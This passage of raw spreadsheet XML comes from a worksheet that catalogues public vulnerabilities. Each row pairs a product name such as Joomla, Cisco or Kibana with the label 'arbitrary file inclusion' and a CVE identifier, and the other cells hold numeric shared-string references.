        <v>19</v>
      </c>
      <c r="B309" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C309" s="2" t="s">
        <v>1023</v>
      </c>
      <c r="D309" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2011-4804</v>
      </c>
      <c r="E309" s="6" t="s">
        <v>1024</v>
      </c>
      <c r="F309" s="4" t="s">
        <v>1025</v>
      </c>
    </row>
    <row r="310" s="4" customFormat="1" spans="1:6">
      <c r="A310" s="2" t="s">
        <v>1026</v>
      </c>
      <c r="B310" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C310" s="2" t="s">
        <v>1027</v>
      </c>
      <c r="D310" s="2" t="str">
        <f t="shared" si="4"/>
        <v>OpenEMR_任意文件包含_CVE-2012-0991</v>
      </c>
      <c r="E310" s="6" t="s">
        <v>1028</v>
      </c>
      <c r="F310" s="4" t="s">
        <v>1029</v>
      </c>
    </row>
    <row r="311" s="4" customFormat="1" spans="1:6">
      <c r="A311" s="2" t="s">
        <v>1030</v>
      </c>
      <c r="B311" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C311" s="2" t="s">
        <v>1031</v>
      </c>
      <c r="D311" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Zimbra Collaboration Server_任意文件包含_CVE-2013-7091</v>
      </c>
      <c r="E311" s="6" t="s">
        <v>1032</v>
      </c>
      <c r="F311" s="4" t="s">
        <v>1033</v>
      </c>
    </row>
    <row r="312" s="4" customFormat="1" spans="1:6">
      <c r="A312" s="2" t="s">
        <v>1034</v>
      </c>
      <c r="B312" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C312" s="2" t="s">
        <v>1035</v>
      </c>
      <c r="D312" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Fonality trixbox_任意文件包含_CVE-2014-5111</v>
      </c>
      <c r="E312" s="6" t="s">
        <v>1036</v>
      </c>
      <c r="F312" s="4" t="s">
        <v>1037</v>
      </c>
    </row>
    <row r="313" s="4" customFormat="1" spans="1:6">
      <c r="A313" s="2" t="s">
        <v>1038</v>
      </c>
      <c r="B313" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C313" s="2" t="s">
        <v>1039</v>
      </c>
      <c r="D313" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Osclass Security Advisory_任意文件包含_CVE-2014-6308</v>
      </c>
      <c r="E313" s="6" t="s">
        <v>1040</v>
      </c>
      <c r="F313" s="4" t="s">
        <v>1041</v>
      </c>
    </row>
    <row r="314" s="4" customFormat="1" spans="1:6">
      <c r="A314" s="2" t="s">
        <v>1042</v>
      </c>
      <c r="B314" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C314" s="2" t="s">
        <v>1043</v>
      </c>
      <c r="D314" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Simple Online Planning Tool_任意文件包含_CVE-2014-8676</v>
      </c>
      <c r="E314" s="6" t="s">
        <v>1044</v>
      </c>
      <c r="F314" s="4" t="s">
        <v>1045</v>
      </c>
    </row>
    <row r="315" s="4" customFormat="1" spans="1:6">
      <c r="A315" s="2" t="s">
        <v>1046</v>
      </c>
      <c r="B315" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C315" s="2" t="s">
        <v>1047</v>
      </c>
      <c r="D315" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Bonita BPM Portal_任意文件包含_CVE-2015-3897</v>
      </c>
      <c r="E315" s="6" t="s">
        <v>1048</v>
      </c>
      <c r="F315" s="4" t="s">
        <v>1049</v>
      </c>
    </row>
    <row r="316" s="4" customFormat="1" spans="1:6">
      <c r="A316" s="2" t="s">
        <v>1050</v>
      </c>
      <c r="B316" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C316" s="2" t="s">
        <v>1051</v>
      </c>
      <c r="D316" s="2" t="str">
        <f t="shared" si="4"/>
        <v>ElasticSearch_任意文件包含_CVE-2015-5531</v>
      </c>
      <c r="E316" s="6" t="s">
        <v>1052</v>
      </c>
      <c r="F316" s="4" t="s">
        <v>1053</v>
      </c>
    </row>
    <row r="317" s="4" customFormat="1" spans="1:6">
      <c r="A317" s="2" t="s">
        <v>597</v>
      </c>
      <c r="B317" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C317" s="2" t="s">
        <v>1054</v>
      </c>
      <c r="D317" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Elasticsearch_任意文件包含_CVE-2015-3337</v>
      </c>
      <c r="E317" s="6" t="s">
        <v>1055</v>
      </c>
      <c r="F317" s="4" t="s">
        <v>1056</v>
      </c>
    </row>
    <row r="318" s="4" customFormat="1" spans="1:6">
      <c r="A318" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B318" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C318" s="2" t="s">
        <v>1057</v>
      </c>
      <c r="D318" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2015-4074</v>
      </c>
      <c r="E318" s="6" t="s">
        <v>1058</v>
      </c>
      <c r="F318" s="4" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="319" s="4" customFormat="1" spans="1:6">
      <c r="A319" s="2" t="s">
        <v>1060</v>
      </c>
      <c r="B319" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C319" s="2" t="s">
        <v>1061</v>
      </c>
      <c r="D319" s="2" t="str">
        <f t="shared" si="4"/>
        <v>ManageEngine Firewall Analyzer_任意文件包含_CVE-2015-7780</v>
      </c>
      <c r="E319" s="6" t="s">
        <v>1062</v>
      </c>
      <c r="F319" s="4" t="s">
        <v>1063</v>
      </c>
    </row>
    <row r="320" s="4" customFormat="1" spans="1:6">
      <c r="A320" s="2" t="s">
        <v>1064</v>
      </c>
      <c r="B320" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C320" s="2" t="s">
        <v>1065</v>
      </c>
      <c r="D320" s="2" t="str">
        <f t="shared" si="4"/>
        <v>SysAid Help Desk_任意文件包含_CVE-2015-2996</v>
      </c>
      <c r="E320" s="6" t="s">
        <v>1066</v>
      </c>
      <c r="F320" s="4" t="s">
        <v>1067</v>
      </c>
    </row>
    <row r="321" s="4" customFormat="1" spans="1:6">
      <c r="A321" s="2" t="s">
        <v>1068</v>
      </c>
      <c r="B321" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C321" s="2" t="s">
        <v>1069</v>
      </c>
      <c r="D321" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Xceedium Xsuite_任意文件包含_CVE-2015-4666</v>
      </c>
      <c r="E321" s="6" t="s">
        <v>1070</v>
      </c>
      <c r="F321" s="4" t="s">
        <v>1071</v>
      </c>
    </row>
    <row r="322" s="4" customFormat="1" spans="1:6">
      <c r="A322" s="2" t="s">
        <v>1072</v>
      </c>
      <c r="B322" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C322" s="2" t="s">
        <v>1073</v>
      </c>
      <c r="D322" s="2" t="str">
        <f t="shared" ref="D322:D385" si="5">_xlfn.TEXTJOIN("_",TRUE,A322:C322)</f>
        <v>Opsview Monitor Pro_任意文件包含_CVE-2016-10367</v>
      </c>
      <c r="E322" s="6" t="s">
        <v>1074</v>
      </c>
      <c r="F322" s="4" t="s">
        <v>1075</v>
      </c>
    </row>
    <row r="323" s="4" customFormat="1" spans="1:6">
      <c r="A323" s="2" t="s">
        <v>1076</v>
      </c>
      <c r="B323" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C323" s="2" t="s">
        <v>1077</v>
      </c>
      <c r="D323" s="2" t="str">
        <f t="shared" si="5"/>
        <v>ZOHO WebNMS Framework _任意文件包含_CVE-2016-6601</v>
      </c>
      <c r="E323" s="6" t="s">
        <v>1078</v>
      </c>
      <c r="F323" s="4" t="s">
        <v>1079</v>
      </c>
    </row>
    <row r="324" s="4" customFormat="1" spans="1:6">
      <c r="A324" s="2" t="s">
        <v>1080</v>
      </c>
      <c r="B324" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C324" s="2" t="s">
        <v>1081</v>
      </c>
      <c r="D324" s="2" t="str">
        <f t="shared" si="5"/>
        <v>FiberHome Routers_任意文件包含_CVE-2017-15647</v>
      </c>
      <c r="E324" s="6" t="s">
        <v>1082</v>
      </c>
      <c r="F324" s="4" t="s">
        <v>1083</v>
      </c>
    </row>
    <row r="325" s="4" customFormat="1" spans="1:6">
      <c r="A325" s="2" t="s">
        <v>1084</v>
      </c>
      <c r="B325" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C325" s="2" t="s">
        <v>1085</v>
      </c>
      <c r="D325" s="2" t="str">
        <f t="shared" si="5"/>
        <v>GlassFish_任意文件包含_CVE-2017-1000028</v>
      </c>
      <c r="E325" s="6" t="s">
        <v>1086</v>
      </c>
      <c r="F325" s="4" t="s">
        <v>1087</v>
      </c>
    </row>
    <row r="326" s="4" customFormat="1" spans="1:6">
      <c r="A326" s="2" t="s">
        <v>1088</v>
      </c>
      <c r="B326" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C326" s="2" t="s">
        <v>1089</v>
      </c>
      <c r="D326" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Yaws_任意文件包含_CVE-2017-10974</v>
      </c>
      <c r="E326" s="6" t="s">
        <v>1090</v>
      </c>
      <c r="F326" s="4" t="s">
        <v>1091</v>
      </c>
    </row>
    <row r="327" s="4" customFormat="1" spans="1:6">
      <c r="A327" s="2" t="s">
        <v>1092</v>
      </c>
      <c r="B327" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C327" s="2" t="s">
        <v>1093</v>
      </c>
      <c r="D327" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Argus Surveillance DVR_任意文件包含_CVE-2018-15745</v>
      </c>
      <c r="E327" s="6" t="s">
        <v>1094</v>
      </c>
      <c r="F327" s="4" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="328" s="4" customFormat="1" spans="1:6">
      <c r="A328" s="2" t="s">
        <v>1096</v>
      </c>
      <c r="B328" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C328" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="D328" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Centos Web Panel_任意文件包含_CVE-2018-18323</v>
      </c>
      <c r="E328" s="6" t="s">
        <v>1098</v>
      </c>
      <c r="F328" s="4" t="s">
        <v>1099</v>
      </c>
    </row>
    <row r="329" s="4" customFormat="1" spans="1:6">
      <c r="A329" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B329" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C329" s="2" t="s">
        <v>1100</v>
      </c>
      <c r="D329" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Cisco_任意文件包含_CVE-2018-0296</v>
      </c>
      <c r="E329" s="6" t="s">
        <v>1101</v>
      </c>
      <c r="F329" s="4" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="330" s="4" customFormat="1" spans="1:6">
      <c r="A330" s="2" t="s">
        <v>1103</v>
      </c>
      <c r="B330" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C330" s="2" t="s">
        <v>1104</v>
      </c>
      <c r="D330" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Drupal avatar_uploader_任意文件包含_CVE-2018-9205</v>
      </c>
      <c r="E330" s="6" t="s">
        <v>1105</v>
      </c>
      <c r="F330" s="4" t="s">
        <v>1106</v>
      </c>
    </row>
    <row r="331" s="4" customFormat="1" spans="1:6">
      <c r="A331" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B331" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C331" s="2" t="s">
        <v>1107</v>
      </c>
      <c r="D331" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Joomla_任意文件包含_CVE-2018-6008</v>
      </c>
      <c r="E331" s="6" t="s">
        <v>1108</v>
      </c>
      <c r="F331" s="4" t="s">
        <v>1109</v>
      </c>
    </row>
    <row r="332" s="4" customFormat="1" spans="1:6">
      <c r="A332" s="2" t="s">
        <v>1110</v>
      </c>
      <c r="B332" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C332" s="2" t="s">
        <v>1111</v>
      </c>
      <c r="D332" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Kibana_任意文件包含_CVE-2018-17246</v>
      </c>
      <c r="E332" s="6" t="s">
        <v>1112</v>
      </c>
      <c r="F332" s="4" t="s">
        <v>1113</v>
      </c>
    </row>
    <row r="333" s="4" customFormat="1" spans="1:6">
      <c r="A333" s="2" t="s">
        <v>1114</v>
      </c>
      <c r="B333" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C333" s="2" t="s">
        <v>1115</v>
      </c>
      <c r="D333" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Loytec LGATE_任意文件包含_CVE-2018-14916</v>
      </c>
      <c r="E333" s="6" t="s">
        <v>1116</v>
      </c>
      <c r="F333" s="4" t="s">
        <v>1117</v>
      </c>
    </row>
    <row r="334" s="4" customFormat="1" spans="1:6">
      <c r="A334" s="2" t="s">
        <v>1118</v>
      </c>
      <c r="B334" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C334" s="2" t="s">
        <v>1119</v>
      </c>
      <c r="D334" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Microstrategy Web_任意文件包含_CVE-2018-18777</v>
      </c>
      <c r="E334" s="6" t="s">
        <v>1120</v>
      </c>
      <c r="F334" s="4" t="s">
        <v>1121</v>
      </c>
    </row>
    <row r="335" s="4" customFormat="1" spans="1:6">
      <c r="A335" s="2" t="s">
        <v>504</v>
      </c>
      <c r="B335" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C335" s="2" t="s">
        <v>1122</v>
      </c>
      <c r="D335" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Rails_任意文件包含_CVE-2018-3760</v>
      </c>
      <c r="E335" s="6" t="s">
        <v>1123</v>
      </c>
      <c r="F335" s="4" t="s">
        <v>1124</v>
      </c>
    </row>
    <row r="336" s="4" customFormat="1" spans="1:6">
      <c r="A336" s="2" t="s">
        <v>528</v>
      </c>
      <c r="B336" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C336" s="2" t="s">
        <v>1125</v>
      </c>
      <c r="D336" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Spring_任意文件包含_CVE-2018-1271</v>
      </c>
      <c r="E336" s="6" t="s">
        <v>1126</v>
      </c>
      <c r="F336" s="4" t="s">
        <v>1127</v>
      </c>
    </row>
    <row r="337" s="4" customFormat="1" spans="1:6">
      <c r="A337" s="2" t="s">
        <v>1128</v>
      </c>
      <c r="B337" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C337" s="2" t="s">
        <v>1129</v>
      </c>
      <c r="D337" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Tarantella Enterprise_任意文件包含_CVE-2018-19753</v>
      </c>
      <c r="E337" s="6" t="s">
        <v>1130</v>
      </c>
      <c r="F337" s="4" t="s">
        <v>1131</v>
      </c>
    </row>
    <row r="338" s="4" customFormat="1" spans="1:6">
      <c r="A338" s="2" t="s">
        <v>1132</v>
      </c>
      <c r="B338" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C338" s="2" t="s">
        <v>1133</v>
      </c>
      <c r="D338" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Tyto Sahi_任意文件包含_CVE-2018-20470</v>
      </c>
      <c r="E338" s="6" t="s">
        <v>1134</v>
      </c>
      <c r="F338" s="4" t="s">
        <v>1135</v>
      </c>
    </row>
    <row r="339" s="4" customFormat="1" spans="1:6">
      <c r="A339" s="2" t="s">
        <v>1136</v>
      </c>
      <c r="B339" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C339" s="2" t="s">
        <v>1137</v>
      </c>
      <c r="D339" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Zeit Next_任意文件包含_CVE-2018-6184</v>
      </c>
      <c r="E339" s="6" t="s">
        <v>1138</v>
      </c>
      <c r="F339" s="4" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="340" s="4" customFormat="1" spans="1:6">
      <c r="A340" s="2" t="s">
        <v>1140</v>
      </c>
      <c r="B340" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C340" s="2" t="s">
        <v>1141</v>
      </c>
      <c r="D340" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Zeta Producer DesktopCMS_任意文件包含_CVE-2018-13980</v>
      </c>
      <c r="E340" s="6" t="s">
        <v>1142</v>
      </c>
      <c r="F340" s="4" t="s">
        <v>1143</v>
      </c>
    </row>
    <row r="341" s="4" customFormat="1" spans="1:6">
      <c r="A341" s="2" t="s">
        <v>1144</v>
      </c>
      <c r="B341" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C341" s="2" t="s">
        <v>1145</v>
      </c>
      <c r="D341" s="2" t="str">
        <f t="shared" si="5"/>
        <v>node_任意文件包含_CVE-2018-3714</v>
      </c>
      <c r="E341" s="6" t="s">
        <v>1146</v>
      </c>
      <c r="F341" s="4" t="s">
        <v>1147</v>
      </c>
    </row>
    <row r="342" s="4" customFormat="1" spans="1:6">
      <c r="A342" s="2" t="s">
        <v>1148</v>
      </c>
      <c r="B342" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C342" s="2" t="s">
        <v>1149</v>
      </c>
      <c r="D342" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Aptana Jaxer_任意文件包含_CVE-2019-14312</v>
      </c>
      <c r="E342" s="6" t="s">
        <v>1150</v>
      </c>
      <c r="F342" s="4" t="s">
        <v>1151</v>
      </c>
    </row>
    <row r="343" s="4" customFormat="1" spans="1:6">
      <c r="A343" s="2" t="s">
        <v>1152</v>
      </c>
      <c r="B343" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C343" s="2" t="s">
        <v>1153</v>
      </c>
      <c r="D343" s="2" t="str">
        <f t="shared" si="5"/>
        <v>BlogEngine_任意文件包含_CVE-2019-10717</v>
      </c>
      <c r="E343" s="6" t="s">
        <v>1154</v>
      </c>
      <c r="F343" s="4" t="s">
        <v>1155</v>
      </c>
    </row>
    <row r="344" s="4" customFormat="1" spans="1:6">
      <c r="A344" s="2" t="s">
        <v>1156</v>
      </c>
      <c r="B344" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C344" s="2" t="s">
        <v>1157</v>
      </c>
      <c r="D344" s="2" t="str">
        <f t="shared" si="5"/>
        <v>DOMOS_任意文件包含_CVE-2019-18665</v>
      </c>
      <c r="E344" s="6" t="s">
        <v>1158</v>
      </c>
      <c r="F344" s="4" t="s">
        <v>1159</v>
      </c>
    </row>
    <row r="345" s="4" customFormat="1" spans="1:6">
      <c r="A345" s="2" t="s">
        <v>1160</v>
      </c>
      <c r="B345" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C345" s="2" t="s">
        <v>1161</v>
      </c>
      <c r="D345" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Deltek Maconomy_任意文件包含_CVE-2019-12314</v>
      </c>
      <c r="E345" s="6" t="s">
        <v>1162</v>
      </c>
      <c r="F345" s="4" t="s">
        <v>1163</v>
      </c>
    </row>
    <row r="346" s="4" customFormat="1" spans="1:6">
      <c r="A346" s="2" t="s">
        <v>1164</v>
      </c>
      <c r="B346" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C346" s="2" t="s">
        <v>1165</v>
      </c>
      <c r="D346" s="2" t="str">
        <f t="shared" si="5"/>
        <v>GrandNode_任意文件包含_CVE-2019-12276</v>
      </c>
      <c r="E346" s="6" t="s">
        <v>1166</v>
      </c>
      <c r="F346" s="4" t="s">
        <v>1167</v>
      </c>
    </row>
    <row r="347" s="4" customFormat="1" spans="1:6">
      <c r="A347" s="2" t="s">
        <v>1168</v>
      </c>
      <c r="B347" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C347" s="2" t="s">
        <v>1169</v>
      </c>
      <c r="D347" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Homematic CCU_任意文件包含_CVE-2019-9726</v>
      </c>
      <c r="E347" s="6" t="s">
        <v>1170</v>
      </c>
      <c r="F347" s="4" t="s">
        <v>1171</v>
      </c>
    </row>
    <row r="348" s="4" customFormat="1" spans="1:6">
      <c r="A348" s="2" t="s">
        <v>1172</v>
      </c>
      <c r="B348" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C348" s="2" t="s">
        <v>1173</v>
      </c>
      <c r="D348" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Huawei Firewall_任意文件包含_CVE-2019-19411</v>
      </c>
      <c r="E348" s="6" t="s">
        <v>1174</v>
      </c>
      <c r="F348" s="4" t="s">
        <v>1175</v>
      </c>
    </row>
    <row r="349" s="4" customFormat="1" spans="1:6">
      <c r="A349" s="2" t="s">
        <v>283</v>
      </c>
      <c r="B349" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C349" s="2" t="s">
        <v>1176</v>
      </c>
      <c r="D349" s="2" t="str">
        <f t="shared" si="5"/>
        <v>IceWarp_任意文件包含_CVE-2019-12593</v>
      </c>
      <c r="E349" s="6" t="s">
        <v>1177</v>
      </c>
      <c r="F349" s="4" t="s">
        <v>1178</v>
      </c>
    </row>
    <row r="350" s="4" customFormat="1" spans="1:6">
      <c r="A350" s="2" t="s">
        <v>1179</v>
      </c>
      <c r="B350" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C350" s="2" t="s">
        <v>1180</v>
      </c>
      <c r="D350" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Ignite Realtime Openfire_任意文件包含_CVE-2019-18393</v>
      </c>
      <c r="E350" s="6" t="s">
        <v>1181</v>
      </c>
      <c r="F350" s="4" t="s">
        <v>1182</v>
      </c>
    </row>
    <row r="351" s="4" customFormat="1" spans="1:6">
      <c r="A351" s="2" t="s">
        <v>1183</v>
      </c>
      <c r="B351" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C351" s="2" t="s">
        <v>1184</v>
      </c>
      <c r="D351" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Jiangnan Online Judge_任意文件包含_CVE-2019-17538</v>
      </c>
      <c r="E351" s="6" t="s">
        <v>1185</v>
      </c>
      <c r="F351" s="4" t="s">
        <v>1186</v>
      </c>
    </row>
    <row r="352" s="4" customFormat="1" spans="1:6">
      <c r="A352" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B352" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C352" s="2" t="s">
        <v>1187</v>
      </c>
      <c r="D352" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Joomla_任意文件包含_CVE-2019-9922</v>
      </c>
      <c r="E352" s="6" t="s">
        <v>1188</v>
      </c>
      <c r="F352" s="4" t="s">
        <v>1189</v>
      </c>
    </row>
    <row r="353" s="4" customFormat="1" spans="1:6">
      <c r="A353" s="2" t="s">
        <v>1190</v>
      </c>
      <c r="B353" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C353" s="2" t="s">
        <v>1191</v>
      </c>
      <c r="D353" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Nimble Streamer_任意文件包含_CVE-2019-11013</v>
      </c>
      <c r="E353" s="6" t="s">
        <v>1192</v>
      </c>
      <c r="F353" s="4" t="s">
        <v>1193</v>
      </c>
    </row>
    <row r="354" s="4" customFormat="1" spans="1:6">
      <c r="A354" s="2" t="s">
        <v>1194</v>
      </c>
      <c r="B354" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C354" s="2" t="s">
        <v>1195</v>
      </c>
      <c r="D354" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Pallets Werkzeug_任意文件包含_CVE-2019-14322</v>
      </c>
      <c r="E354" s="6" t="s">
        <v>1196</v>
      </c>
      <c r="F354" s="4" t="s">
        <v>1197</v>
      </c>
    </row>
    <row r="355" s="4" customFormat="1" spans="1:6">
      <c r="A355" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="B355" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C355" s="2" t="s">
        <v>1199</v>
      </c>
      <c r="D355" s="2" t="str">
        <f t="shared" si="5"/>
        <v>PilusCart_任意文件包含_CVE-2019-16123</v>
      </c>
      <c r="E355" s="6" t="s">
        <v>1200</v>
      </c>
      <c r="F355" s="4" t="s">
        <v>1201</v>
      </c>
    </row>
    <row r="356" s="4" customFormat="1" spans="1:6">
      <c r="A356" s="2" t="s">
        <v>528</v>
      </c>
      <c r="B356" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C356" s="2" t="s">
        <v>1202</v>
      </c>
      <c r="D356" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Spring_任意文件包含_CVE-2019-3799</v>
      </c>
      <c r="E356" s="6" t="s">
        <v>1203</v>
      </c>
      <c r="F356" s="4" t="s">
        <v>1204</v>
      </c>
    </row>
    <row r="357" s="4" customFormat="1" spans="1:6">
      <c r="A357" s="2" t="s">
        <v>1205</v>
      </c>
      <c r="B357" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C357" s="2" t="s">
        <v>1206</v>
      </c>
      <c r="D357" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Totaljs_任意文件包含_CVE-2019-8903</v>
      </c>
      <c r="E357" s="6" t="s">
        <v>1207</v>
      </c>
      <c r="F357" s="4" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="358" s="4" customFormat="1" spans="1:6">
      <c r="A358" s="2" t="s">
        <v>1209</v>
      </c>
      <c r="B358" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C358" s="2" t="s">
        <v>1210</v>
      </c>
      <c r="D358" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Wavemaker Studio_任意文件包含_CVE-2019-8982</v>
      </c>
      <c r="E358" s="6" t="s">
        <v>1211</v>
      </c>
      <c r="F358" s="4" t="s">
        <v>1212</v>
      </c>
    </row>
    <row r="359" s="4" customFormat="1" spans="1:6">
      <c r="A359" s="2" t="s">
        <v>1213</v>
      </c>
      <c r="B359" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C359" s="2" t="s">
        <v>1214</v>
      </c>
      <c r="D359" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Xiaomi Mi WiFi R Routers_任意文件包含_CVE-2019-18371</v>
      </c>
      <c r="E359" s="6" t="s">
        <v>1215</v>
      </c>
      <c r="F359" s="4" t="s">
        <v>1216</v>
      </c>
    </row>
    <row r="360" s="4" customFormat="1" spans="1:6">
      <c r="A360" s="2" t="s">
        <v>1217</v>
      </c>
      <c r="B360" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C360" s="2" t="s">
        <v>1218</v>
      </c>
      <c r="D360" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Artica Proxy Community Edition_任意文件包含_CVE-2020-13158</v>
      </c>
      <c r="E360" s="6" t="s">
        <v>1219</v>
      </c>
      <c r="F360" s="4" t="s">
        <v>1220</v>
      </c>
    </row>
    <row r="361" s="4" customFormat="1" spans="1:6">
      <c r="A361" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B361" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C361" s="2" t="s">
        <v>1221</v>
      </c>
      <c r="D361" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Cisco_任意文件包含_CVE-2020-3452</v>
      </c>
      <c r="E361" s="6" t="s">
        <v>1222</v>
      </c>
      <c r="F361" s="4" t="s">
        <v>1223</v>
      </c>
    </row>
    <row r="362" s="4" customFormat="1" spans="1:6">
      <c r="A362" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B362" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C362" s="2" t="s">
        <v>1224</v>
      </c>
      <c r="D362" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Cisco_任意文件包含_CVE-2020-26073</v>
      </c>
      <c r="E362" s="6" t="s">
        <v>1225</v>
      </c>
      <c r="F362" s="4" t="s">
        <v>1226</v>
      </c>
    </row>
    <row r="363" s="4" customFormat="1" spans="1:6">
      <c r="A363" s="2" t="s">
        <v>1227</v>
      </c>
      <c r="B363" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C363" s="2" t="s">
        <v>1228</v>
      </c>
      <c r="D363" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Citrix_任意文件包含_CVE-2020-8209</v>
      </c>
      <c r="E363" s="6" t="s">
        <v>1229</v>
      </c>
      <c r="F363" s="4" t="s">
        <v>1230</v>
      </c>
    </row>
    <row r="364" s="4" customFormat="1" spans="1:6">
      <c r="A364" s="2" t="s">
        <v>1231</v>
      </c>
      <c r="B364" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C364" s="2" t="s">
        <v>1232</v>
      </c>
      <c r="D364" s="2" t="str">
        <f t="shared" si="5"/>
        <v>GateOne_任意文件包含_CVE-2020-35736</v>
      </c>
      <c r="E364" s="6" t="s">
        <v>1233</v>
      </c>
      <c r="F364" s="4" t="s">
        <v>1234</v>
      </c>
    </row>
    <row r="365" s="4" customFormat="1" spans="1:6">
      <c r="A365" s="2" t="s">
        <v>1235</v>
      </c>
      <c r="B365" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C365" s="2" t="s">
        <v>1236</v>
      </c>
      <c r="D365" s="2" t="str">
        <f t="shared" si="5"/>
        <v>LimeSurvey_任意文件包含_CVE-2020-11455</v>
      </c>
      <c r="E365" s="6" t="s">
        <v>1237</v>
      </c>
      <c r="F365" s="4" t="s">
        <v>1238</v>
      </c>
    </row>
    <row r="366" s="4" customFormat="1" spans="1:6">
      <c r="A366" s="2" t="s">
        <v>1239</v>
      </c>
      <c r="B366" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C366" s="2" t="s">
        <v>1240</v>
      </c>
      <c r="D366" s="2" t="str">
        <f t="shared" si="5"/>
        <v>LionWiki_任意文件包含_CVE-2020-27191</v>
      </c>
      <c r="E366" s="6" t="s">
        <v>1241</v>
      </c>
